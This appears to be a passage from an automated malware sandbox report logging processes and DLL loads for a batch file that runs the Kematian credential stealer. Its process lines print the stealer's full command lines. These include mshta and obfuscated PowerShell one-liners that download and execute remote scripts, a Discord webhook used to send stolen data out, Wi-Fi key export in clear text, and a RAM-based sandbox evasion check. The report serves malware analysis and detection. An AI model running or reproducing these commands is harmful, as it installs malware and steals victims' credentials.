      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net session
      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0))
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESA945.tmp" "c:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net sessionJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) Jump to behavior
      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 sessionJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iexJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clearJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1')) Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESA945.tmp" "c:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP"
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dllJump to behavior
      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
